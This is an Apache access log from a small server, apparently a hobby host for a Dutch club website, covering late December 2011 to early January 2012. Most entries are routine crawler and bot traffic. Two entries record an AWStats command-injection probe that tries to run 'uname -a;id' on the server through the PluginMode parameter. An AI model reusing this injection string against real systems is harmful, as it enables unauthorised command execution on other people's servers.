95.108.151.244 - - [30/Dec/2011:14:52:37 +0100] "GET / HTTP/1.1" 200 372 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [30/Dec/2011:14:52:38 +0100] "GET / HTTP/1.1" 200 372 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
193.252.118.176 - - [31/Dec/2011:01:11:12 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
109.123.116.170 - - [31/Dec/2011:02:16:42 +0100] "GET /robots.txt HTTP/1.1" 404 466 "http://domains.checkparams.com/index.php?q=deinon.net" "Mozilla/5.0 (compatible; DCPbot/1.0; +http://domains.checkparams.com/)"
109.123.116.170 - - [31/Dec/2011:02:16:42 +0100] "GET / HTTP/1.1" 200 335 "http://domains.checkparams.com/index.php?q=deinon.net" "Mozilla/5.0 (compatible; DCPbot/1.0; +http://domains.checkparams.com/)"
124.115.1.62 - - [31/Dec/2011:03:44:52 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.71.1 - - [31/Dec/2011:03:46:11 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.1 - - [31/Dec/2011:03:46:12 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=category&layout=blog&id=19&Itemid=56&limitstart=10 HTTP/1.1" 200 3535 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.115.10.193 - - [31/Dec/2011:04:39:22 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.66 - - [31/Dec/2011:04:40:33 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [31/Dec/2011:04:41:00 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [31/Dec/2011:04:54:00 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.125.71.84 - - [31/Dec/2011:09:03:27 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
114.80.93.71 - - [31/Dec/2011:11:09:50 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.6.10 - - [31/Dec/2011:14:01:33 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Sosospider+(+http://help.soso.com/webspider.htm)"
123.125.71.90 - - [31/Dec/2011:18:04:29 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
208.80.194.29 - - [31/Dec/2011:23:25:01 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.022; .NET CLR 1.1.4322)"
124.115.1.62 - - [01/Jan/2012:04:01:51 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.71.1 - - [01/Jan/2012:04:02:25 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.1 - - [01/Jan/2012:04:02:25 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=42:fotos-jx-toernooi-bcrs&catid=6:jeugd&Itemid=34 HTTP/1.1" 200 2777 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.115.10.193 - - [01/Jan/2012:04:04:41 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [01/Jan/2012:04:24:44 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [01/Jan/2012:04:33:26 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.66 - - [01/Jan/2012:04:37:40 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.71.1 - - [01/Jan/2012:07:48:02 +0100] "GET /torrentflux/downloads/hans/Buena%20Vista%20Social%20Club%20-%20Rhythms%20Del%20Mundo HTTP/1.1" 404 544 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.115.6.10 - - [01/Jan/2012:15:59:04 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Sosospider+(+http://help.soso.com/webspider.htm)"
114.80.93.71 - - [01/Jan/2012:19:17:01 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
77.88.24.28 - - [01/Jan/2012:20:32:29 +0100] "GET /robots.txt HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
174.133.91.136 - - [01/Jan/2012:22:44:38 +0100] "GET //cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+system(\"uname -a;id\");+ HTTP/1.1" 404 477 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
174.133.91.136 - - [01/Jan/2012:23:19:52 +0100] "GET //cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+system(\"uname -a;id\");+ HTTP/1.1" 404 477 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
77.88.24.28 - - [02/Jan/2012:01:01:50 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
124.115.1.66 - - [02/Jan/2012:04:34:41 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [02/Jan/2012:04:40:07 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [02/Jan/2012:04:41:12 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [02/Jan/2012:05:01:29 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.10.193 - - [02/Jan/2012:05:02:36 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.80.194.32 - - [02/Jan/2012:06:58:18 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)"
123.125.71.74 - - [02/Jan/2012:08:25:11 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
66.249.71.1 - - [02/Jan/2012:09:40:04 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.1 - - [02/Jan/2012:09:40:04 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=61:oproep-van-de-kantinecommissie&catid=12:kantine&Itemid=34 HTTP/1.1" 200 3336 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.70 - - [02/Jan/2012:14:01:45 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.71.1 - - [02/Jan/2012:14:13:40 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=18&Itemid=43 HTTP/1.1" 200 2683 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.207 - - [02/Jan/2012:17:54:57 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=16&Itemid=41 HTTP/1.1" 200 2798 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.115.6.10 - - [02/Jan/2012:18:28:35 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Sosospider+(+http://help.soso.com/webspider.htm)"
77.88.24.28 - - [02/Jan/2012:21:18:03 +0100] "GET /robots.txt HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.66.207 - - [02/Jan/2012:21:21:24 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=38:indeling-jeugdcompetitie-2011&catid=6:jeugd&Itemid=34 HTTP/1.1" 200 2939 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.207 - - [02/Jan/2012:22:30:22 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.207 - - [02/Jan/2012:22:30:23 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=3&limitstart=12 HTTP/1.1" 200 3813 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.207 - - [03/Jan/2012:00:27:19 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=3&limitstart=56 HTTP/1.1" 200 4010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.252.118.176 - - [03/Jan/2012:01:17:39 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.118.176 - - [03/Jan/2012:01:17:56 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
124.115.1.66 - - [03/Jan/2012:05:08:24 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [03/Jan/2012:05:14:06 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [03/Jan/2012:05:34:55 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [03/Jan/2012:05:39:17 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
77.88.24.28 - - [03/Jan/2012:10:29:46 +0100] "GET /~roel/apport.crash HTTP/1.1" 404 510 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.66.207 - - [03/Jan/2012:10:48:11 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.207 - - [03/Jan/2012:10:48:11 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=85:steun-de-sport-en-spel-dag&catid=6:jeugd&Itemid=34 HTTP/1.1" 200 3309 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.222.128.221 - - [03/Jan/2012:12:11:24 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; aiHitBot/1.0; +http://www.aihit.com/)"
77.222.128.221 - - [03/Jan/2012:12:11:26 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/5.0 (compatible; aiHitBot/1.0; +http://www.aihit.com/)"
66.249.66.207 - - [03/Jan/2012:14:04:30 +0100] "GET /~roel/gdb.bt.txt HTTP/1.1" 404 510 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.80.194.29 - - [03/Jan/2012:14:55:44 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sbcydsl 3.12; SV1; YPC 3.2.0; yplus 5.1.03b)"
66.249.71.1 - - [03/Jan/2012:16:42:27 +0100] "GET /~roel/apport.crash HTTP/1.1" 404 510 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.80.93.71 - - [03/Jan/2012:16:52:40 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.71.1 - - [03/Jan/2012:17:55:01 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=22&Itemid=47 HTTP/1.1" 200 3814 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.58.178.56 - - [03/Jan/2012:18:30:16 +0100] "GET /robots.txt HTTP/1.1" 404 472 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3"
69.58.178.56 - - [03/Jan/2012:18:30:18 +0100] "GET / HTTP/1.1" 200 298 "-" "BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 ips-agent"
66.249.71.1 - - [03/Jan/2012:18:41:09 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=5:website-bcrs-online&catid=7:website&Itemid=34 HTTP/1.1" 200 3100 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.1 - - [03/Jan/2012:19:10:10 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=category&id=6:jeugd&Itemid=34&layout=default HTTP/1.1" 200 3584 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.1 - - [03/Jan/2012:19:10:43 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=27&Itemid=51 HTTP/1.1" 200 3305 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.32 - - [03/Jan/2012:19:36:00 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.91 - - [03/Jan/2012:19:36:20 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
124.115.6.10 - - [03/Jan/2012:20:53:11 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Sosospider+(+http://help.soso.com/webspider.htm)"
208.80.194.29 - - [03/Jan/2012:21:35:35 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Interfree Kit; MEGAUPLOAD 1.0)"
66.249.71.1 - - [03/Jan/2012:22:11:11 +0100] "GET /~gin/djpics/mosbooth.jpg HTTP/1.1" 404 516 "http://www.dj2dj.nl/forum/viewtopic.php?f=2&t=1922" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.125.78.82 - - [03/Jan/2012:22:16:43 +0100] "GET /~gin/djpics/mybooth1.jpg HTTP/1.1" 404 460 "http://www.dj2dj.nl/forum/viewtopic.php?f=2&t=2668" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.51 (KHTML, like Gecko; Google Web Preview) Chrome/12.0.742 Safari/534.51"
66.249.71.1 - - [03/Jan/2012:23:57:16 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.1 - - [03/Jan/2012:23:57:16 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=6&Itemid=30 HTTP/1.1" 200 3310 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.115.1.66 - - [04/Jan/2012:03:54:28 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [04/Jan/2012:04:13:27 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [04/Jan/2012:04:15:20 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [04/Jan/2012:04:22:08 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
65.52.104.88 - - [04/Jan/2012:07:32:17 +0100] "GET /robots.txt HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.104.88 - - [04/Jan/2012:07:35:59 +0100] "GET / HTTP/1.1" 304 211 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.204.211 - - [04/Jan/2012:07:40:38 +0100] "GET / HTTP/1.1" 200 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko)"
66.249.71.1 - - [04/Jan/2012:08:57:29 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=3&limitstart=52 HTTP/1.1" 200 3569 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.21 - - [04/Jan/2012:09:31:18 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.88 - - [04/Jan/2012:09:31:29 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
123.125.71.104 - - [04/Jan/2012:10:33:59 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.86 - - [04/Jan/2012:17:45:23 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
123.125.71.25 - - [04/Jan/2012:17:46:42 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
208.80.194.35 - - [04/Jan/2012:22:24:54 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; SIMBAR Enabled; SIMBAR={E64954C3-E6BC-47c7-9209-3BE4AA62F40D}; SIMBAR=0; .NET CLR 1.1.4322)"
124.115.6.10 - - [04/Jan/2012:23:03:39 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Sosospider+(+http://help.soso.com/webspider.htm)"
123.125.71.84 - - [05/Jan/2012:04:19:30 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
124.115.1.61 - - [05/Jan/2012:04:44:35 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [05/Jan/2012:05:01:13 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [05/Jan/2012:05:07:06 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.66 - - [05/Jan/2012:05:08:58 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.72.138 - - [05/Jan/2012:05:26:43 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.138 - - [05/Jan/2012:05:26:43 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=9&Itemid=31 HTTP/1.1" 200 3513 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.24 - - [05/Jan/2012:07:32:26 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.97 - - [05/Jan/2012:07:33:01 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
123.125.67.147 - - [05/Jan/2012:08:45:12 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
216.145.5.42 - - [05/Jan/2012:10:33:51 +0100] "GET /robots.txt HTTP/1.0" 404 491 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.5.42 - - [05/Jan/2012:10:33:52 +0100] "GET / HTTP/1.1" 200 335 "http://whois.domaintools.com/deinon.net" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
176.9.87.106 - - [05/Jan/2012:14:15:28 +0100] "GET /robots.txt HTTP/1.0" 404 491 "-" "Acoon v4.1.0 (www.acoon.de)"
176.9.87.106 - - [05/Jan/2012:14:15:28 +0100] "GET / HTTP/1.0" 200 291 "-" "Acoon v4.1.0 (www.acoon.de)"
66.249.72.138 - - [05/Jan/2012:20:34:05 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.138 - - [05/Jan/2012:20:34:05 +0100] "GET /~gerard/ HTTP/1.1" 304 211 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.138 - - [05/Jan/2012:22:18:10 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=category&layout=blog&id=19&Itemid=56&limitstart=10 HTTP/1.1" 200 3536 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.88.24.28 - - [05/Jan/2012:23:00:46 +0100] "GET /robots.txt HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
193.252.118.176 - - [06/Jan/2012:00:42:36 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
124.115.6.10 - - [06/Jan/2012:01:04:05 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Sosospider+(+http://help.soso.com/webspider.htm)"
124.115.11.187 - - [06/Jan/2012:05:19:41 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [06/Jan/2012:05:20:37 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [06/Jan/2012:05:26:02 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.249.72.138 - - [06/Jan/2012:06:41:52 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.138 - - [06/Jan/2012:06:41:52 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=article&id=17&Itemid=40 HTTP/1.1" 200 2710 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.70 - - [06/Jan/2012:06:58:11 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
208.80.194.26 - - [06/Jan/2012:09:08:07 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {88CA84D6-1B06-4D56-B3E6-FF0E2D95686E}; .NET CLR 1.1.4322)"
66.249.72.138 - - [06/Jan/2012:09:20:45 +0100] "GET /~gerard/bcrs/index.php?option=com_content&view=category&layout=blog&id=19&Itemid=56&format=feed&type=atom HTTP/1.1" 200 16996 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
159.253.145.175 - - [06/Jan/2012:12:20:25 +0100] "GET / HTTP/1.1" 200 335 "http://www.deinon.net" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
220.181.108.80 - - [06/Jan/2012:12:34:07 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
123.125.71.35 - - [06/Jan/2012:12:37:15 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
124.115.1.66 - - [06/Jan/2012:19:57:43 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.6.10 - - [07/Jan/2012:03:02:11 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Sosospider+(+http://help.soso.com/webspider.htm)"
124.115.1.66 - - [07/Jan/2012:04:43:08 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.11.187 - - [07/Jan/2012:05:14:49 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [07/Jan/2012:05:36:33 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.62 - - [07/Jan/2012:06:17:17 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.125.71.87 - - [07/Jan/2012:09:08:12 +0100] "GET /robots.txt HTTP/1.1" 404 466 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.74 - - [07/Jan/2012:10:50:09 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.78 - - [07/Jan/2012:13:33:42 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
209.20.69.196 - - [07/Jan/2012:17:26:43 +0100] "GET / HTTP/1.1" 200 291 "-" "Python-urllib/2.6"
208.80.194.29 - - [07/Jan/2012:19:55:37 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1; yplus 5.1.02b)"
74.52.245.146 - - [07/Jan/2012:20:40:16 +0100] "GET / HTTP/1.0" 200 291 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
124.115.11.187 - - [08/Jan/2012:04:34:35 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.6.10 - - [08/Jan/2012:04:58:56 +0100] "GET /robots.txt HTTP/1.1" 404 504 "-" "Sosospider+(+http://help.soso.com/webspider.htm)"
124.115.1.62 - - [08/Jan/2012:05:17:42 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.66 - - [08/Jan/2012:05:20:15 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
124.115.1.61 - - [08/Jan/2012:05:36:17 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.125.71.55 - - [08/Jan/2012:05:56:00 +0100] "GET / HTTP/1.1" 200 335 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
114.80.93.71 - - [08/Jan/2012:07:08:51 +0100] "GET / HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
